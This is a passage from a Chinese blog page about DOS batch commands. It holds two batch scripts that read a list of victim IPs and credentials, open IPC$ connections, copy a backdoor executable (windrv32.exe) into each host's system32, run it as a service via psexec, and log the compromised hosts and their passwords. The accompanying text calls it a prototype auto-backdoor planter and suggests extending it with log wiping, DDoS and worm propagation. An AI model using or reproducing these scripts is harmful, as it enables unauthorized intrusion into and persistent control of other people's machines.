📄 批处理讲解.htm
字号:
<P> @if "%1"=="" goto usage </P>
<P> @for /f "tokens=1,2,3 delims= " %%i in
(victim.txt) do start call <BR> IPChack.bat %%i
%%j %%k </P>
<P> @goto end </P>
<P> :usage </P>
<P> @echo run this batch in dos modle.or just
double-click it. </P>
<P> :end </P>
<P> --------------- cut here then save as a
batchfile(I call it main.bat ) <BR>
--------------------------- </P>
<P> </P>
<P> </P>
<P> ------------------- cut here then save as a
batchfile(I call it door.bat) <BR>
----------------------------- </P>
<P> @net use \\%1\ipc$ %3 /u:"%2" </P>
<P> @if errorlevel 1 goto failed </P>
<P> @echo Trying to establish the IPC$ connection
…………OK </P>
<P> @copy windrv32.exe\\%1\admin$\system32
&& if not errorlevel 1 echo IP %1 <BR>
USER %2 PWD %3 >>ko.txt </P>
<P> @p***ec \\%1 c:\winnt\system32\windrv32.exe
</P>
<P> @p***ec \\%1 net start windrv32 && if
not errorlevel 1 echo %1 Backdoored <BR>
>>ko.txt </P>
<P> :failed </P>
<P> @echo Sorry can not connected to the victim.
</P>
<P> ----------------- cut here then save as a
batchfile(I call it door.bat) <BR>
-------------------------------- </P>
<P>
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 </P>
<P>
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.<BR></P></FONT></DIV>
<DIV class=blog_bottom>
<UL>
<LI>15:28 </LI>
<LI>浏览 (1836) </LI>
<LI><A href="http://hooke.javaeye.com/blog/45843#comments">评论</A> (0) </LI>
<LI class=last><A class=more href="http://www.javaeye.com/wiki/topic/45843"
target=_blank>相关推荐</A> </LI></UL></DIV>
<DIV class=blog_comment>
<H5>评论</H5><A id=comments name=comments></A></DIV>
<DIV class=blog_comment>
<H5>发表评论</H5>
<FORM id=comment_form onsubmit="return false;" action=/blog/45843
method=post><INPUT id=editor_bbcode_flag type=hidden>
<DIV id=editor_main><TEXTAREA class="validate-richeditor bad-words min-length-5" id=editor_body style="WIDTH: 500px; HEIGHT: 350px" name=comment[body] rows=20 cols=40></TEXTAREA></DIV>
<SCRIPT type=text/javascript> var editor = new Control.TextArea.Editor("editor_body", "bbcode", false);</SCRIPT>
<P style="PADDING-RIGHT: 30px; TEXT-ALIGN: right">您还没有登录,请<A
href="http://hooke.javaeye.com/login">登录</A>后发表评论 <INPUT class=submit id=submit_button type=submit value=提交 name=commit></P></FORM>
<SCRIPT type=text/javascript> new Validation("comment_form", {immediate: false, onFormValidate: function(result, form){ if(confirm('您需要登录以后才能执行这个操作,现在要登录吗?')) window.location.href = '/login'; }}); </SCRIPT>
</DIV></DIV>
<SCRIPT type=text/javascript> dp.SyntaxHighlighter.HighlightAll('code', true, true); fix_image_size($$('div.blog_content img'), 700); function quote_comment(link) { var quote_user = $(link).previous(0).innerHTML; var quote_body = $(link).up().next().innerHTML.stripTags(); editor.bbcode_editor.textarea.insertAfterSelection('[quote="'+quote_user+'"]\n' + quote_body + '\n[/quote]\n'); }</SCRIPT>
</DIV>
<DIV id=local>
<DIV class=local_top></DIV>
<DIV id=blog_owner>
<DIV id=blog_owner_logo><A href="http://hooke.javaeye.com/"><IMG class=logo
title="hooke的博客: hooke" alt=用户头像
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/12f93134-71bf-4a88-8605-f87ab92c13d1.jpg"></A></DIV>
<DIV id=blog_owner_name>hooke</DIV></DIV>
<DIV id=blog_actions>
<UL>
<LI>浏览: 9179 次
<LI>性别: <IMG title=男 alt=Icon_minigender_1
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/icon_minigender_1.gif">
<LI>来自: 上海
<LI><IMG src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/offline.gif">
<LI><A class=profile href="http://hooke.javaeye.com/blog/profile">详细资料</A> <A
class=guest_book href="http://hooke.javaeye.com/blog/guest_book">留言簿</A>
</LI></UL>
<H5>搜索本博客</H5>
<FORM action=/blog/search method=get><INPUT class=text id=query
style="MARGIN-LEFT: 10px; WIDTH: 110px" name=query> <INPUT class=submit type=submit value=搜索> </FORM></DIV>
<DIV class=clearfix id=user_visits>
<H5>最近访客</H5>
<DIV class=left>
<DIV class=clearfix>
<DIV class=logo><A href="http://chenyuanhua2008.javaeye.com/" target=_blank><IMG
class=logo title="chenyuanhua2008的博客: " alt=用户头像
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/user-logo-thumb.gif"></A></DIV></DIV><A
href="http://chenyuanhua2008.javaeye.com/" target=_blank>chenyuanhua2008</A>
</DIV>
<DIV class=left>
<DIV class=clearfix>
<DIV class=logo><A href="http://cosmicwind.javaeye.com/" target=_blank><IMG
class=logo title="CosmicWind的博客: CosmicWind" alt=用户头像
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/53d03d91-ab5c-4adc-853b-c39519a2a573-thumb.jpg"></A></DIV></DIV><A
href="http://cosmicwind.javaeye.com/" target=_blank>CosmicWind</A> </DIV>
<DIV class=left>
<DIV class=clearfix>
<DIV class=logo><A href="http://hhyear.javaeye.com/" target=_blank><IMG
class=logo title="hhyear的博客: hhyear" alt=用户头像
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/user-logo-thumb.gif"></A></DIV></DIV><A
href="http://hhyear.javaeye.com/" target=_blank>hhyear</A> </DIV>
<DIV class=left>
<DIV class=clearfix>
<DIV class=logo><A href="http://lindows.javaeye.com/" target=_blank><IMG
class=logo title="siemens800的博客: Lindows " alt=用户头像
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/62f2ceaa-6437-3b6a-83bd-c6c9a3cb8baa-thumb.jpg"></A></DIV></DIV><A
href="http://lindows.javaeye.com/" target=_blank>siemens800</A> </DIV>
<DIV class=left id=more_user_visits><A
href="http://hooke.javaeye.com/blog/user_visits">>>更多访客</A></DIV></DIV>
<DIV id=blog_menu>
<H5>博客分类</H5>
<UL>
<LI><A href="http://hooke.javaeye.com/">全部博客 (18)</A> </LI></UL></DIV>
<DIV id=blog_others>
<H5>其他分类</H5>
<UL>
<LI><A href="http://hooke.javaeye.com/blog/favorite">我的收藏</A> (1)
<LI><A href="http://hooke.javaeye.com/blog/forum/46455">我的论坛帖子</A> (0)
<LI><A href="http://hooke.javaeye.com/blog/article">我的精华良好贴</A> (0)
</LI></UL></DIV>
<DIV id=recent_groups>
<H5>最近加入圈子</H5>
<UL></UL></DIV>
<DIV id=month_blogs>
<H5>存档</H5>
<UL>
<LI><A href="http://hooke.javaeye.com/blog/monthblog/2009-02">2009-02</A> (2)
<LI><A href="http://hooke.javaeye.com/blog/monthblog/2007-10">2007-10</A> (1)
<LI><A href="http://hooke.javaeye.com/blog/monthblog/2007-09">2007-09</A> (1)
<LI><A href="http://hooke.javaeye.com/blog/monthblog_more">更多存档...</A>
</LI></UL></DIV>
<DIV id=recent_comments>
<H5>最新评论</H5>
<UL>
<LI><A title="tomcat 下SSL客户端验证相关配置"
href="http://hooke.javaeye.com/blog/127738#comments">tomcat 下SSL客户端验证
...</A><BR>请问IE访问tomcatSS时候,tomcat 如何信任所有证书<BR>-- by <A
href="http://szc8.javaeye.com/" target=_blank>szc8</A> </LI></UL></DIV>
<DIV id=comments_top>
<H5>评论排行榜</H5>
<UL>
<LI><A href="http://hooke.javaeye.com/blog/334130">java 设计模式</A>
<LI><A href="http://hooke.javaeye.com/blog/340347">windows 安装后内存占用</A>
</LI></UL></DIV>
<DIV id=rss>
<UL>
<LI><A href="http://hooke.javaeye.com/rss" target=_blank><IMG alt=Rss
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/rss.png"></A>
<LI><A
href="http://fusion.google.com/add?feedurl=http://hooke.javaeye.com/rss"
target=_blank><IMG alt=Rss_google
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/rss_google.gif"></A>
<LI><A
href="http://www.zhuaxia.com/add_channel.php?url=http://hooke.javaeye.com/rss"
target=_blank><IMG alt=Rss_zhuaxia
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/rss_zhuaxia.gif"></A>
<LI><A
href="http://www.xianguo.com/subscribe.php?url=http://hooke.javaeye.com/rss"
target=_blank><IMG alt=Rss_xianguo
src="dos 批处理 命令大全 - hooke - JavaEye技术网站.files/rss_xianguo.jpg"></A>
<LI><A href="http://www.google.com/search?hl=zh-CN&q=RSS">[什么是RSS?]</A>
</LI></UL></DIV>
<DIV class=local_bottom></DIV></DIV></DIV>
<DIV class=clearfix id=footer>
<DIV id=copyright>
<HR>
声明:JavaEye文章版权属于作者,受法律保护。没有作者书面许可不得转载。若作者同意转载,必须以超链接形式标明文章原始出处和作者。<BR>©
2003-2009 JavaEye.com. All rights reserved. 上海炯耐计算机软件有限公司 [ 沪ICP备05023328号 ]
</DIV></DIV></DIV>
<SCRIPT type=text/javascript> document.write("<img src='http://stat.javaeye.com/?url="+ encodeURIComponent(document.location.href) + "&referrer=" + encodeURIComponent(document.referrer) + "&logged_in=no" + "' width='0' height='0' />");</SCRIPT>
</BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -